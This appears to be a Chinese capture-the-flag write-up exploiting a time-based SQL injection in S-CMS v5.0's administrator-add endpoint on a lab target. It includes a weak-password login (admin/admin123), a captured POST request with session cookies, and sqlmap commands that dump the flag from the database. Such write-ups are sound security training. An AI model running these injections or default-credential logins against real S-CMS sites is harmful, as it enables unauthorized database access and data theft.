简介

S-CMS v5.0 被发现存在SQLI。

过程

打开靶场，扫描目录，发现/admin后台登陆界面

弱口令admin/admin123登录

经过查看，发现账号管理功能，添加管理员账号存在sql注入，添加管理员，进行抓包

抓取数据如下

POST /admin/ajax.php?type=admin&action=add&lang=0 HTTP/1.1
Host: eci-2ze3coesyry14wow6mhh.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 99
Origin: http://eci-2ze3coesyry14wow6mhh.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze3coesyry14wow6mhh.cloudeci1.ichunqiu.com/admin/
Cookie: count_all=0; authx=; userx=; passx=; user=admin; pass=7b19569b9317927e14152e312767a351; A_type=1; auth=1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1%7C1; newsauth=all; productauth=all; textauth=all; formauth=all; bbsauth=all; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1718723953,1718802016,1718849866,1718896116; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1718896116; PHPSESSID=acfe9ecbc6e48d2e492b8169ab7da438
Priority: u=1

A_login=asd&A_pwd=asd&A_email=asd%40qq.com&A_type=1&A_a0=1&A_textauth%5B%5D=13&A_newsauth%5B%5D=107

放入sqlmap跑

python sqlmap.py -r ceshi.txt --dbs --batch

发现A_newsauth等四个参数均存在sql注入，跑 A_newsauth，存在时间注入

python sqlmap.py -r ceshi.txt -p A_newsauth%5B%5D -randomize=A_login  --dbs --batch

 

查找flag

python sqlmap.py -r ceshi.txt -p A_newsauth%5B%5D -randomize=A_login --dbms mysql --sql-query "SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM  information_schema.COLUMNS   WHERE COLUMN_NAME = 'flag' limit 2,1"

读取flag

python sqlmap.py -r ceshi.py -p A_newsauth%5B%5D -randomize=A_login --dbms mysql --sql-query "SELECT substring(flag,17,1) from scms.fllllaaaag"

得到flag{8ef3b98b-c8d2-4af1-82bf-a5ce95cd955e}